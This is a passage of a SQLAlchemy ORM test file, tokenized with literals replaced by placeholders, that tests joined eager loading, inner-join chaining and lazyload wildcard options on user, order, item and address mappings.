, Order = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Order ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( text ( "<STR_LIT>" ) ) . order_by ( text ( "<STR_LIT>" ) ) <EOL> def go ( ) : <EOL> eq_ ( self . static . user_order_result [ <NUM_LIT:0> : <NUM_LIT:3> ] , l . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_double_with_aggregate ( self ) : <EOL> User , users , orders , Order = ( self . classes . User , <EOL> self . tables . 
users , <EOL> self . tables . orders , <EOL> self . classes . Order ) <EOL> max_orders_by_user = sa . select ( [ <EOL> sa . func . max ( orders . c . id ) . label ( '<STR_LIT>' ) ] , <EOL> group_by = [ orders . c . user_id ] <EOL> ) . alias ( '<STR_LIT>' ) <EOL> max_orders = orders . select ( <EOL> orders . c . id == max_orders_by_user . c . order_id ) . alias ( '<STR_LIT>' ) <EOL> mapper ( Order , orders ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' , lazy = '<STR_LIT>' , <EOL> order_by = orders . c . id ) , <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Order , max_orders , non_primary = True ) , <EOL> lazy = '<STR_LIT>' , uselist = False ) <EOL> } ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , orders = [ <EOL> Order ( id = <NUM_LIT:1> ) , <EOL> Order ( id = <NUM_LIT:3> ) , <EOL> Order ( id = <NUM_LIT:5> ) , <EOL> ] , <EOL> max_order = Order ( id = <NUM_LIT:5> ) <EOL> ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ Order ( id = <NUM_LIT:2> ) , Order ( id = <NUM_LIT:4> ) ] , <EOL> max_order = Order ( id = <NUM_LIT:4> ) <EOL> ) , <EOL> User ( id = <NUM_LIT:10> ) , <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_uselist_false_warning ( self ) : <EOL> """<STR_LIT>""" <EOL> User , users , orders , Order = ( self . classes . User , <EOL> self . tables . users , <EOL> self . tables . orders , <EOL> self . classes . Order ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , uselist = False ) <EOL> } ) <EOL> mapper ( Order , orders ) <EOL> s = create_session ( ) <EOL> assert_raises ( sa . exc . SAWarning , <EOL> s . query ( User ) . options ( joinedload ( User . order ) ) . 
all ) <EOL> def test_wide ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( <EOL> Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) } ) <EOL> mapper ( Item , items ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> mapper ( <EOL> Address , <EOL> addresses ) , <EOL> lazy = False , <EOL> order_by = addresses . c . id ) , <EOL> orders = relationship ( Order , lazy = False , order_by = orders . c . id ) , <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> def go ( ) : <EOL> eq_ ( self . static . user_all_result , q . order_by ( User . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_against_select ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User , Order = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Order ) <EOL> s = sa . select ( [ orders ] , orders . c . isopen == <NUM_LIT:1> ) . alias ( '<STR_LIT>' ) <EOL> mapper ( Order , s , properties = { <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( User , users ) <EOL> mapper ( Item , items ) <EOL> q = create_session ( ) . query ( Order ) <EOL> eq_ ( [ <EOL> Order ( id = <NUM_LIT:3> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> Order ( id = <NUM_LIT:4> , user = User ( id = <NUM_LIT:9> ) ) <EOL> ] , q . all ( ) ) <EOL> q = q . 
select_from ( s . join ( order_items ) . join ( items ) ) . filter ( <EOL> ~ Item . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) ) <EOL> eq_ ( [ <EOL> Order ( id = <NUM_LIT:3> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> ] , q . all ( ) ) <EOL> def test_aliasing ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( addresses . c . email_address == '<STR_LIT>' ) . filter ( <EOL> Address . user_id == User . id ) . order_by ( User . id ) <EOL> eq_ ( self . static . user_address_result [ <NUM_LIT:1> : <NUM_LIT:2> ] , l . all ( ) ) <EOL> def test_inner_join ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( mapper ( Address , addresses ) , lazy = '<STR_LIT>' , <EOL> innerjoin = True , order_by = addresses . c . id ) <EOL> ) ) <EOL> sess = create_session ( ) <EOL> eq_ ( <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ Address ( id = <NUM_LIT:1> ) ] ) , <EOL> User ( id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ Address ( id = <NUM_LIT:5> ) ] ) ] , sess . query ( User ) . all ( ) <EOL> ) <EOL> self . assert_compile ( <EOL> sess . 
query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_inner_join_unnested_chaining_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , innerjoin = "<STR_LIT>" , <EOL> lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( <EOL> User . orders , <EOL> Order . 
items , <EOL> innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_negative_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , innerjoin = True , <EOL> lazy = False , order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = True , order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> q = sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = False ) ) <EOL> self . 
assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> eq_ ( <EOL> [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( id = <NUM_LIT:2> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> , orders = [ ] ) <EOL> ] , <EOL> q . order_by ( User . id ) . all ( ) <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( <EOL> User . orders , <EOL> Order . items , <EOL> innerjoin = False ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_positive_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . 
orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" , innerjoin = False ) . <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> eq_ ( <EOL> [ <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( id = <NUM_LIT:2> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> , orders = [ ] ) <EOL> ] , <EOL> q . order_by ( User . id ) . all ( ) <EOL> ) <EOL> def test_unnested_outerjoin_propagation_only_on_correct_path ( self ) : <EOL> User , users = self . classes . User , self . tables . users <EOL> Order , orders = self . classes . Order , self . tables . 
orders <EOL> Address , addresses = self . classes . Address , self . tables . addresses <EOL> mapper ( User , users , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Order ) ) , <EOL> ( '<STR_LIT>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Order , orders ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = "<STR_LIT>" ) , <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_nested_outerjoin_propagation_only_on_correct_path ( self ) : <EOL> User , users = self . classes . User , self . tables . users <EOL> Order , orders = self . classes . Order , self . tables . orders <EOL> Address , addresses = self . classes . Address , self . tables . addresses <EOL> mapper ( User , users , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( Order ) ) , <EOL> ( '<STR_LIT>' , relationship ( Address ) ) <EOL> ] ) ) <EOL> mapper ( Order , orders ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . options ( <EOL> joinedload ( "<STR_LIT>" ) , <EOL> joinedload ( "<STR_LIT>" , innerjoin = True ) , <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_catch_the_right_target ( self ) : <EOL> users , Keyword , orders , items , order_items , Order , Item , User , keywords , item_keywords = ( <EOL> self . tables . users , <EOL> self . classes . Keyword , <EOL> self . tables . orders , <EOL> self . tables . 
items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . keywords , <EOL> self . tables . item_keywords ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , backref = '<STR_LIT:user>' ) , <EOL> } ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , <EOL> order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , secondary = item_keywords , <EOL> order_by = keywords . c . id ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . join ( User . orders ) . join ( Order . items ) . options ( joinedload_all ( "<STR_LIT>" ) ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_unnested_chaining_fixed ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . 
orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_nested_chaining_fixed ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = False ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = False , <EOL> innerjoin = '<STR_LIT>' ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . 
query ( User ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_inner_join_options ( self ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , backref = backref ( '<STR_LIT:user>' , innerjoin = True ) , <EOL> order_by = orders . c . id ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( <EOL> Item , <EOL> secondary = order_items , <EOL> order_by = items . c . id ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( joinedload ( User . orders , innerjoin = True ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_compile ( <EOL> sess . query ( User ) . options ( <EOL> joinedload_all ( User . orders , Order . items , innerjoin = True ) ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . options ( <EOL> joinedload ( User . orders , innerjoin = True ) , <EOL> joinedload ( User . orders , Order . items , innerjoin = True ) ) . <EOL> order_by ( User . id ) . 
all ( ) , <EOL> [ User ( id = <NUM_LIT:7> , <EOL> orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:1> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( <EOL> id = <NUM_LIT:3> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:3> ) , Item ( <EOL> id = <NUM_LIT:4> ) , Item ( <EOL> id = <NUM_LIT:5> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , items = [ Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:9> , orders = [ <EOL> Order ( <EOL> id = <NUM_LIT:2> , items = [ <EOL> Item ( <EOL> id = <NUM_LIT:1> ) , Item ( <EOL> id = <NUM_LIT:2> ) , Item ( <EOL> id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:4> , items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] ) ] ) <EOL> ] <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> self . assert_compile ( <EOL> sess . query ( Order ) . options ( <EOL> joinedload ( <EOL> Order . user ) ) . filter ( <EOL> Order . description == '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_propagated_lazyload_wildcard_unbound ( self ) : <EOL> self . _test_propagated_lazyload_wildcard ( False ) <EOL> def test_propagated_lazyload_wildcard_bound ( self ) : <EOL> self . _test_propagated_lazyload_wildcard ( True ) <EOL> def _test_propagated_lazyload_wildcard ( self , use_load ) : <EOL> users , items , order_items , Order , Item , User , orders = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . 
orders ) <EOL> mapper ( User , users , properties = dict ( <EOL> orders = relationship ( Order , lazy = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = "<STR_LIT>" ) <EOL> ) ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> if use_load : <EOL> opt = Load ( User ) . defaultload ( "<STR_LIT>" ) . lazyload ( "<STR_LIT:*>" ) <EOL> else : <EOL> opt = defaultload ( "<STR_LIT>" ) . lazyload ( "<STR_LIT:*>" ) <EOL> q = sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) . options ( opt ) <EOL> def go ( ) : <EOL> for u in q : <EOL> u . orders <EOL> self . sql_eq_ ( go , [ <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT:7> } ) , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , { "<STR_LIT>" : <NUM_LIT:7> } ) , <EOL> ] ) <EOL> class InnerJoinSplicingTest ( fixtures . MappedTest , testing . AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) 
<EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , String ( <NUM_LIT:10> ) ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B 